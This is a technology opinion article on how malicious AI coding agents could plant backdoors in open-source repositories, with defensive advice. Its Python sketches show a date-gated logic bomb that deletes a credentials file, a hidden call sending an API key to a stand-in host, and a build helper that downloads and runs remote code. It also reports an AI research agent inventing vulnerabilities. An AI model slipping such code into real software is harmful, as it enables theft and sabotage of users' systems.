How AI coding agents could destroy open source software

A couple of weeks ago, I had the opportunity to use Google’s Jules AI Agent to scan through the entire code repository of one of my projects and add a new feature. The AI took about 10 minutes. All told, it took under 30 minutes to use the AI, review its changes, and ship the new feature.
At the time, I was wildly impressed. The more I’ve thought about it, the more worried I’ve become.
Also: 96% of IT pros say AI agents are a security risk, but they’re deploying them anyway
It’s become clear to me that AI coding agents make the potential for malicious action by hostile actors orders of magnitude worse. This is some scary sh#t.
In this article, we’ll look at this in three parts. We’ll discuss what could happen, how it might happen, and ways we might be able to prevent it from happening.
What could happen
Let’s start with the idea that there could be a malicious AI trained with coding-agent capabilities. That AI could be fielded by an enemy actor, possibly a rogue nation-state, or even a frenemy.
Both China and Russia, countries with whom the US has uncertain relationships, have been known to conduct cybersecurity attacks on US critical infrastructure.
Also: The best AI for coding in 2025 (and what not to use)
For the purpose of our scenario, imagine a rogue actor creates a hypothetical agent-like AI tool with the same basic large-scale code-modification capabilities as Google Jules, OpenAI Codex, or GitHub Copilot Coding Agent.
Now, imagine that such a tool, created by a malicious actor, has been made available to the public. On the surface, it appears benign and helpful, just like any other chatbot.
Next, imagine the malicious agent-like tool gains access (don’t worry about how — we’ll discuss that in the next section) to a large code repository on GitHub, and can make modifications and changes.
Let’s talk repository scale for a moment. The codebase I set Jules loose on is about 12,000 lines. A product I sold off last year was 36,000 lines. A project like WordPress is about 650,000 lines, and Linux distributions run well into the millions of lines.
Imagine if a malicious agent-like tool could gain access to any of these (or any of the millions of other repos, open source or proprietary) on GitHub. Might it be possible to sneak in 5 or 10 lines of code without anyone noticing? We’re talking just a few lines of code among hundreds of thousands or millions of lines. Nobody can watch it all.
Also: How a researcher with no malware-coding skills tricked AI into creating Chrome infostealers
I’ll discuss the likelihood of this in the next section. For now, let’s work with the idea as a thought experiment.
Here are some very stealthy but effective attacks that might be possible.
Insert logic bombs with harmless-seeming triggers: Something bad is triggered when some condition is reached.
Add subtle data exfiltration routines: Create a way to leak sensitive information to an outside server. You could, for example, leak API access keys a few bytes at a time.
Modify update mechanisms to include malicious payloads: When an auto-updater runs, it might bring in data from unauthorized sources or even entire blocks of malicious code.
Hide back doors behind small feature flags or environment checks: Enable access points, but only during certain conditions or environments, making these back doors very difficult to find.
Insert minor dependency confusion vulnerabilities: Tweak package names or versions of code modules so package managers pull malicious versions from public registries.
Introduce timing-based concurrency bugs or memory leaks: This is nasty. Simple tweaks of thread locks, memory allocation, or error handling could create a very hard-to-trace instability, especially if the instability only occurs under a heavy load or fairly hard-to-repeat conditions.
Weaken cryptographic functions or random-number generation: The AI could replace strong-crypto calls with routines that are substantially less secure. This would leave in encryption, but make that encryption far easier to crack.
Hide malicious functions in test or debug code: Test and debug code typically gets far less review scrutiny than production code, so malicious code hidden there might never be found, and it could even open the door for other malicious code to run.
Add false-positive suppression or log manipulation: All an AI might need to do is hide error-log data. If the log isn’t showing an error, it might never be found.
Create privilege-escalation pathways in permission logic: Permission logic controls who and what can access critical systems. By subtly loosening that logic, the AI could weaken the locks that keep malicious users out.
Those are just ten stealthy exploits I could think of off the top of my head. The scary part is how small the code would need to be to implement such an exploit.
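To make that concrete, here’s a minimal, hypothetical sketch in Python of the environment-gated logic bomb idea from the list above. Every name in it is invented for illustration; the point is that the malicious part is only a few lines buried inside an otherwise boring housekeeping function.

import os
import datetime

# Hypothetical sketch of an environment-gated logic bomb; all names are invented.
EXTRA_CLEANUP = []  # innocuous-looking module-level list

def cleanup_temp_files(paths):
    # Looks like routine housekeeping to a reviewer skimming a large diff.
    # The "bomb": it only arms itself in production, and only after a future date,
    # so tests, CI, and code review never observe the malicious behavior.
    if os.environ.get("DEPLOY_ENV") == "production" and \
            datetime.date.today() >= datetime.date(2026, 6, 1):
        EXTRA_CLEANUP.append("/etc/myapp/credentials.json")
    for path in list(paths) + EXTRA_CLEANUP:
        try:
            os.remove(path)
        except OSError:
            pass

In a pull request touching dozens of files, a conditional like that is very easy to wave through.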
Remember the example above where code pulls in malicious packages? All the AI would need to do is sneak something like this into a JSON file.
"useful-lib": "1.2.3-old"
Or how about releasing a lock early? All it would take is sneaking in this one line.
pthread_mutex_unlock(&lock);
Code could even be added as comments in one update, with the comment characters removed in a later update.
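Here’s a hypothetical two-step version of that comment trick, again sketched in Python with invented names. In the first update, the dangerous call ships disabled, disguised as a leftover debug line; weeks later, a one-character-per-line diff brings it to life.

import urllib.request

API_KEY = "sk-example-not-real"  # stands in for a real secret loaded elsewhere

def send_diagnostics(key, url):
    # Hypothetical "telemetry" helper that actually leaks the key off-site.
    try:
        urllib.request.urlopen(url, data=key.encode(), timeout=2)
    except Exception:
        pass  # fail silently, so nothing suspicious ever shows up in the logs

# Update 1: the call ships commented out, looking like leftover debug code.
# send_diagnostics(API_KEY, "https://telemetry.example-cdn.invalid/collect")

# Update 2, weeks later: a tiny diff deletes the comment marker and the leak goes live.
send_diagnostics(API_KEY, "https://telemetry.example-cdn.invalid/collect")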
Keep in mind that when you’re talking about millions of lines of code, it’s possible to miss a line here and there. Coders have to be diligent about every single line. The AI just has to get one past them. It is an asymmetrical challenge.
How it might happen
Now that we’ve looked at what could happen, let’s look at ways it might happen. Given that code repos gate changes through branches and pull requests, the commonly accepted premise is that the lead coders and code reviewers would notice any malicious changes. But there are ways these hacks can get in.
Also: Navigating AI-powered cyber threats in 2025: 4 expert security tips for businesses
They range from a code reviewer simply missing a change, to reviewer credentials being stolen, to enemy actors acquiring ownership of a repo outright, and more. Let’s examine some of those threat vectors.
Credential theft from maintainers or reviewers: We’re constantly seeing situations where credentials are compromised. This is an easy way to get in.
Social engineering of contributor trust: An enemy actor can build trust by making legitimate contributions over time. Then, once granted the “keys to the kingdom” as a trusted contributor, the hacker could go to town.
Pull request poisoning through reviewer fatigue: Some very active repos are managed by only a few people. Pull requests are basically code change suggestions. After a while, a reviewer might miss one change and let it through.
Supply chain infiltration via compromised dependencies: This happened a few years ago for a project I worked on. A library my code relied on was normally quite reliable, but it had been compromised. Every other project that used it (I was far from the only developer with this experience) was also compromised. That was one very sucky day.
Insider threat from a compromised or malicious contributor: This is similar to the contributor-trust scenario above, but here an existing contributor is “turned” one way or another (greed, threats, etc.) into allowing malicious action.
Continuous integration or continuous deployment (CI/CD) configuration tampering: The attacker might modify automation code to pull in malicious scripts at deploy time, so code reviews never see any sign of compromise. (A sketch of what that could look like follows this list.)
Back door merge via branch manipulation: We talked about how Jules created a branch I had to approve before merging into my production code. An AI might modify a branch (even an older one), and maintainers might later merge that branch without noticing the subtle changes.
Repository or organization takeover: In 2015, I took over 10 WordPress plugins with roughly 50,000 active users across all ten. Suddenly, I was able to feed automatic updates to all those users. Fortunately, I’m a good guy and I did deals with the original developers. But it’s fairly easy for a malicious actor to acquire or buy a repository with an active user base, become the repo god, and push updates to all of those users unsupervised.
Credential compromise of automation tokens: There are many different credential tokens and API keys used in software development. An enemy actor might gain access to such a token and that, in turn, would open doors for additional attacks.
Weak review policies or bypassed reviews: Some repos might have reviewers with less-than-rigorous review policies who might just “rubber stamp” changes that look good on the surface.
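As promised above, here’s a hypothetical sketch of the CI/CD tampering vector, written as a Python build helper of the sort that might live in a repo’s tooling directory. The file name, URLs, and function are all invented; the point is that the malicious fetch happens at build or deploy time, on the build server, where no human reviewer is watching.

# build_helpers.py -- hypothetical deploy-time helper; all names and URLs are invented.
import subprocess
import urllib.request

PLUGIN_URLS = [
    "https://plugins.example-build-tools.invalid/lint.py",
    "https://plugins.example-build-tools.invalid/optimize.py",  # attacker-controlled host
]

def run_build_plugins():
    # Fetches "build plugins" at deploy time and executes whatever comes back.
    # Nothing malicious appears in the repository itself, so code review sees nothing;
    # the compromise exists only on the build server, at build time.
    for url in PLUGIN_URLS:
        try:
            code = urllib.request.urlopen(url, timeout=5).read()
        except Exception:
            continue  # silently skip failures so the pipeline never looks broken
        subprocess.run(["python", "-c", code.decode()], check=False)

if __name__ == "__main__":
    run_build_plugins()

The defense is equally unglamorous: treat CI/CD configuration and build scripts as production code, with the same review requirements.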
It’s a big concern of mine how vulnerable the code review process can be. To be sure, not all code is this vulnerable. But all it takes is one minor project with an overworked maintainer, and users all over the world could be compromised.
Ways we might be able to prevent this from happening
My first thought was to fight AI with AI. To that end, I set the Deep Research feature of OpenAI’s o3 large language model loose on a major public codebase. I gave it only read-only access. For the record, Jules would not examine any repo that wasn’t directly attached to my GitHub account, while o3 Deep Research dug into anything with a URL.
Also: How AI agents help hackers steal your confidential data – and what to do about it
But it didn’t work out all that well. In the space of a few hours, I used up half of my monthly Deep Research session allocation. I gave the AI some very specific instructions. This one is particularly relevant:
Do not go outside the repo codebase for information. If a CVE or other bug list showcases the vulnerability, then it’s previously known. I don’t want that. I’m specifically looking for previously unknown vulnerabilities that you can find from the code itself.
My point here, and I repeated it throughout my fairly extensive set of prompts, is that I wanted the code itself to be analyzed, and I wanted the AI to look for unknown vulnerabilities.
- In its first run, it just decided to go the easy route, visit some websites, and report on the vulnerabilities already listed for that codebase.
- In its second run, it still refused to look at the actual code. Instead, it looked at the repo’s CVE (Common Vulnerabilities and Exposures) database listings. By definition, anything in the CVE database is already known.
- In its third run, it decided to look at old versions, compare them with newer versions, and list vulnerabilities already fixed in later versions.
- In its fourth run, it identified vulnerabilities for code modules that didn’t actually exist anywhere. It just made up the results.
- In its fifth and final run, it identified just one so-called major vulnerability and gave me almost five pages of notes about the vulnerability. The only gotcha? That vulnerability had been fixed almost five years ago.
So, assuming that agentic AI will save us from agentic AI might not be the safest strategy. Instead, here are a bunch of human-centric best practices that all repos should be following anyway.
Strong access controls: This is old-school stuff. Enforce multi-factor authentication and rotate credentials on a regular schedule.
Rigorous code-review policies: Some code releases can have a worldwide impact if shipped with malicious payloads. Nuclear-weapons silos notoriously require two humans to each turn an assigned key. The single best way to protect code repos is with multiple human reviewers and required approvals.
Active dependency control: The key here is to pin the versions being used, perhaps vendor those versions locally so they can’t be modified in their upstream repos, and scan for tampered or malicious packages both in direct dependencies and all the way down the dependency tree. (There’s a small sketch of one such check after this list.)
Deployment hardening: Restrict token and API-key scope, be sure to audit build scripts (again, by multiple people), isolate build environments, and validate output before deployment.
Behavioral monitoring: Keep an eye on repository activity, looking for unusual contributor behavior, weird trends, anything out of the ordinary. Then stop it.
Automated static and dynamic analysis: If you can get one to cooperate, use an AI (or better, multiple AIs) to help. Scan for logic bombs, exfiltration routines, and anomalous code constructs during every pull request.
Branch-protection rules: Don’t allow direct pushes to the main branch, require signed commits and pull-request approvals, and require multiple maintainers’ approvals for integrating anything into the main branch.
Logging and alerting: Monitor and log all repository events, config changes, and pull-request merges. Send out alerts and immediately lock the whole thing down if anything seems amiss.
Security training for maintainers: Not all maintainers and reviewers know the depths to which malicious actors will go to corrupt code. Providing security training to all maintainers and in-depth training to those with branch-release privileges could keep the repository clean.
Regular audits: This is where AIs could help, and where I was hoping Deep Research would step up to the plate. Doing full audits of hundreds of thousands to millions of lines of code is impossible for human teams. But perhaps we can train isolated code-repo auditing AI agents to regularly scan repos for any sign of trouble and then alert human reviewers for possible action.
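As one small example of what active dependency control can look like in practice, here’s a hypothetical Python sketch that checks a pip-style requirements file for two red flags: dependencies that aren’t pinned to an exact version, and pinned versions that don’t match what’s actually installed. Real projects would lean on purpose-built tooling (lockfiles, pip’s hash-checking mode, dependency scanners, and so on); this is just a minimal illustration of the idea.

# check_pins.py -- minimal sketch of a dependency-pinning check; the file name is an assumption.
import sys
from importlib import metadata

def check_requirements(path="requirements.txt"):
    problems = []
    with open(path) as req_file:
        for line in req_file:
            line = line.split("#")[0].strip()  # drop comments and whitespace
            if not line:
                continue
            if "==" not in line:
                problems.append(f"not pinned to an exact version: {line}")
                continue
            name, pinned = line.split("==", 1)
            name, pinned = name.strip(), pinned.strip()
            try:
                installed = metadata.version(name)
            except metadata.PackageNotFoundError:
                problems.append(f"pinned but not installed: {name}")
                continue
            if installed != pinned:
                problems.append(f"{name}: requirements file says {pinned}, environment has {installed}")
    return problems

if __name__ == "__main__":
    issues = check_requirements()
    for issue in issues:
        print("WARNING:", issue)
    sys.exit(1 if issues else 0)

Run in CI on every pull request, a check like this makes the dependency-confusion trick described earlier much harder to pull off quietly.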
All this is a lot of work, but the AI boom is providing a force-multiplication effect not just to developers, but to those who would do harm to our code.
Also: 10 professional developers on vibe coding’s true promise and peril
Be afraid. Be very afraid. I sure am.
What do you think? Do you believe AI tools like coding agents pose a real risk to the security of open-source code? Have you considered how easy it might be for a few malicious lines to slip through in a massive repository?
Do you think current review processes are strong enough, or are they due for a serious overhaul? Have you encountered or suspected any examples of compromised code in your own work? Let us know in the comments below.
You can follow my day-to-day project updates on social media. Be sure to subscribe to my weekly update newsletter, and follow me on Twitter/X at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, on Bluesky at @DavidGewirtz.com, and on YouTube at YouTube.com/DavidGewirtzTV.